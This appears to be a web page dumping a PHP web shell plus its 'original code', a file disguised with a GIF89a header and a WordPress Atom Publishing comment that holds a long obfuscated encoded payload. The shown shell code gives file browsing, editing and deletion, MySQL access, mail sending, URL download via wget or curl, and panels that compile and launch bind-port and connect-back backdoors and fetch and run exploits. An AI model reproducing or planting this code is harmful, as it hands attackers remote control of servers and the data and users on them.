SHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_POST['mail_send'])){ $mail_to = $_POST['mail_to']; $mail_from = $_POST['mail_from']; $mail_subject = $_POST['mail_subject']; $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to</td></tr> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />&nbsp; from</td></tr> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr> <tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table> "; if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","
"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?> </div> </body> </html> 

Did this file decode correctly?

Original Code

GIF89a?????!????,???????D?;?<?php
/**
 * Atom Publishing Protocol support for WordPress
 *
 * @version 1.0.5-dc
 */

/**
 * WordPress is handling an Atom Publishing Protocol request.
 *
 * @var bool
 */
@error_reporting(0);
@set_time_limit(0);

$code = "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